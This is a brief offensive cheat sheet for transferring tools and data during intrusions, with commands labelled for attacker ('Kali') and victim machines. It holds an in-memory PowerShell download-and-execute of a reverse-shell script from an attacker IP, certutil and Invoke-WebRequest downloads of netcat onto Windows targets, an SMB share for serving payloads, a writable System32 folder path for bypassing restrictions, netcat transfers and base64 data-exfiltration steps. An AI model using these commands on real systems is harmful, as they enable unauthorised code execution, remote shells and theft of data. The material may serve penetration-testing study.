Load PS1 in memory
powershell "IEX(New-Object Net.WebClient).downloadString('<http://192.168.119.122/Utilities/Revshells/shell.ps1>')"
Windows upload via certutil.exe
certutil.exe -split -urlcache -f <http://192.168.119.122/Utilities/Binaries/nc.exe>
Windows upload via powershell
powershell Invoke-WebRequest -Uri " <http://192.168.119.122/Utilities/Binaries/nc.exe>" -OutFile C:\\temp\\nc.exe
SMBServer is a good option for windows when dealing with firewalls and needing port 80 for catching shells
#Kali
smbserver.py -smb2support a .
#Victim
\\\\IP\\a\\nc.exe
File Upload windows route bypass
C:\\Windows\\System32\\spool\\drivers\\color
Netcat Transfers
nc 10.10.10.15 4444 < file_to_transfer
nc -lvnp 4444 > file_to_transfer
SCP transfer (requires ssh access)
scp user@ip:/filename /path #from
scp filename user@ip:/path #to
Data exfiltration via base64
#Linux
zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt
#Windows
powershell Compress-Archive -LiteralPath dir -DestinationPath ./exfil.zip
certuitl -encode exfil.zip exfil.txt